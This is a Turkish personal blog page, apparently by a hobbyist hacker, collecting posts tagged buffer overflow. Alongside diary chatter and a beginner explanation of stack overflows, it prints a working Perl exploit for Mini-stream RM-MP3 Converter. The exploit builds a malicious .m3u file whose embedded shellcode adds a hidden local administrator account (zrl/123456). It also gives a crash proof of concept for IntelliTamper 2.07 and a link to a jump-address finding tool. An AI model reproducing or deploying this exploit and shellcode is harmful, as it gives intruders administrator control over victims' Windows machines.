"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

buffer overflow etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
buffer overflow etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster

26 Temmuz 2011 Salı

özlemişim :))

ocak 17-temmuz 26 baya bi zaman geçmiş :)) pr aşağı düşmüş aşağılık kopmleksi yaşıyormuş :P doktor muhtemelen asker ;) life kardeşimle görüşemedim bile :(( bla aylardır bloğuna uğramamış ben gibi :(( vs vs vs ben neler yaptım küçük bi site tasarladım public yaparım çok eksiği var :) ama tema vs beni sardı. buffer overflow a baya bi yoğunlaştım ara ara kafayı mı yiyorum diye tereddütler yaşayınca aralar verdim :) verdiğim aralarda da siteyi tasarladım :) php baya bi ilerlettim yani uzmanlık seviyesinde değil ama benim işimi görüyor. bol bol lfi ile uğrastım :DD keza python yine baş tacı :)) 20 bilemedin 25 gün kadar da kpss hazırlandım çok bile :)) bu kadar başka değişiklik yok.

17 Ocak 2011 Pazartesi

Mini-stream RM-MP3 Converter Buffer Overflow Exploit




# Title : Mini-stream RM-MP3 Converter Buffer Overflow Exploit
# Author : ZoRLu
# Proof : http://img843.imageshack.us/img843/3144/buffer.jpg
# Desc. : usr: zrl , pass: 123456 , localgroup: Administrator
#Tested : xp/sp3
# mail-msn : admin@yildirimordulari.com
# Home : http://z0rlu.blogspot.com
# Date : 04/01/2011
# Teşekkür : Dr.Ly0n LifeSteaLeR

my $dosya= "zrl.m3u";
my $zart= "\x41" x 26059;
my $zurt= "\x90" x 24;
my $eip = pack('V',0x7E3EA32F); # 0x7E3EA32F user32.dll jmp esp

# windows/exec - 127 bytes
# Thanks to http://www.exploit-db.com/exploits/15063/
# Encoder: win32/ZoRLu
# Desc.: usr: zrl , pass: 123456
# CMD=Add Admin
my $shell = "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x5d\x53\xbb\xad\x23\x86\x7c".
"\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff".
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73".
"\x65\x72\x20\x7a\x72\x6c\x20\x31\x32\x33\x34\x35\x36\x20\x2f\x61\x64".
"\x64\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f".
"\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73".
"\x20\x2f\x61\x64\x64\x20\x7a\x72\x6c\x20\x26\x26\x20\x6e\x65\x74\x20".

"\x75\x73\x65\x72\x20\x7a\x72\x6c";

open($FILE,">$dosya");
print $FILE $zart.$eip.$zurt.$shell;
close($FILE);
print "\n$dosya Dosyasi Hazir\n";

7 Ağustos 2010 Cumartesi

findjmp

buffer overflow ile ilgilenenlerin işine yarar aradım zor buldum a.q :S sizlerlede paylaşayım kullanırsınız

Not:
içiniz rahat olsun dosyayı gönül rahatlığıyla indirip kullanabilirsiniz bende yamuk olmaz ;)

download:

http://hotfile.com/dl/60589778/0841783/findjmp.zip.html

16 Ekim 2009 Cuma

beynimde buffer overflow :( msnim hacklen(me)miş olabilir

şurdan vardım o kanıya birincisi hiç oturum acılmadı benim msn de a.q hiç olmasa hacked by x yazıp hava atardı hackleyen ben rastlamadım rastlayan olduysa burdan bildirsin lütfen ;) ikincisi benim msn ile bloğuda hackleyebilirdi fakat herhangi bi hamle yapılmamış yani sifre talep edip bloğu ele gecirebilirdi hackleyen kişi. geriye tek bi ihtimal kaldı msn şifremi değiştim fakat şimdi hatırlayamıyorum. o günlerde buffer overflow ile meşguldüm en sonunda başardım 2 program için buffer overflow exploit yazdım onu başardım fakat farkında olmadan beynimde de bi hafıza taşması oldu mu diye düşünmüyor değilim :( biraz mola vermenin zamanı geldi gibi :(

3 Temmuz 2009 Cuma

Buffer Overflowa Sebep Olan Fonksiyonlar

gets() -> fgets() – karakterleri okur

strcpy() -> strncpy() – içeriği önbelleğe kopyalar.
strcat() -> strncat() – önbellek birleştirme, sıralama
sprintf() -> snprintf() – önbelleği farklı tipteki verilerle doldurur

(f)scanf() – STDIN’den okur

getwd() – çalışılan dizini döndürür

realpath() – tam yolu döndürür

2 Temmuz 2009 Perşembe

buffer overflow mantığı

kafayı yedim a.q buffer yüzünden ama nettim nettim öğrendim mantığını azda olsa :P şimdi mantık su her programda geçici hafıza (stack) mevcut eğer bu geçici hafıza denetimi sağlam olmazsa gerekenden fazla veri göndererek hafızada tasmaya sebep olabiliriz. diyelim programdan bi bi istekte bulunduk program isteği alıyor ve iletiyor aynı yolu takip ederek size cevap veriyor. işte eğer hafıza taşmasına sebep olursak geri dönüşte bizim belirlediğimiz yolu takip etmesini sağlayabiliriz. ve bizim belirlediğimiz yol ilede kendi exp. imizi çalıştırabiliyoruz. linux içinde root exp yazmanın mantığı bu. diyelim ki linux ta bi modül de şöyle bi fonksiyon olsun:
(unutmayın bu buffer işinde süper değilim hatta kötüyüm sadece ingilizce dökümanlardan çıkardığım mantığı anlatmaya çalışıyorum)

işte linuxta ki bir misali modülümüz ve içinde şu kodu barındırıyor olsun (kodu .c uzantılı kaydedin) :

void main(int argc, char **argv, char **envp) {

char array[200];
strcpy(array,argv[1]);

}

kodumuzu kaydedip derliyoruz nasılmı şöyle:

zorlu@ZoRLu:~/Masaüstü$ gcc buf.c -o buf1
buf.c: In function 'main':
buf.c:4: UYARI: 'strcpy' yerleşik işlevinin uyumsuz örtük bildirimi
buf.c:1: UYARI: 'main' için dönüş türü 'int' değil
zorlu@ZoRLu:~/Masaüstü$ chmod 777 buf1

ve derledikten sonra chmod ayarınıda yapıp çalıştırıyoruz:
zorlu@ZoRLu:~/Masaüstü$ ./buf1
ve şu hatayı alıyoruz:

Segmentation fault ( yani core dumped)

şimdi küçük bi işlemle dosyamıza veri gönderiyoruz:

şekilde gibi belli bir veriden sonra buffer olayı gercekleşiyor



şimdi core dumped hatasını alabileceğimiz veri miktarını buluyoruz ve ben buldum kurduğum ubuntuda:

zorlu@ZoRLu:~/Masaüstü$ ./buf1 `perl -e 'print "A" x 362'`BBBB
Segmentation fault

işte asıl işlemler bundan sonra başlıyor yok efenim eax, jmp vs vs daha okadar ileri gidemedim. umarım azda olsa sizde mantığını anlarsınız

10 Nisan 2009 Cuma

intellitamper v2.07 (.txt file ) Local buffer overflow POC

kaynak: http://packetstormsecurity.org/0904-exploits/intellitamper207-overflow.txt

Kaynak: http://www.yildirimordulari.com/showthread.php?t=3913



# Author: ZoRLu
# Home: yildirimordulari.com & z0rlu.blogspot.com & dafgamers.com
# Msn: trt-turk@hotmail.com
# Not: herkes hecker olmus :S
# intellitamper v2.07 (.txt file ) Local buffer overflow POC
# EAX 7EFEFEFE
# ECX 3F82EA97
# EDX 41414141
# EBX FE0C702F
# ESP 001235C8
# ESI 01F455A4
# EDI 00130000 ASCII "Actx "
# EIP 00416369 intellit.00416369

# EDX 41414141 for char 50644
# --------------------------------------------------------
#!/usr/bin/perl
#[*] intellitamper v2.07 (.txt file ) Local buffer overflow POC
use warnings;
use strict;
my $chars = "\x41" x 50644 ;
my $file="z0rlu.txt";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file Dosya Hazir. \n";
# ----------------------------------------------------------

 
Dizi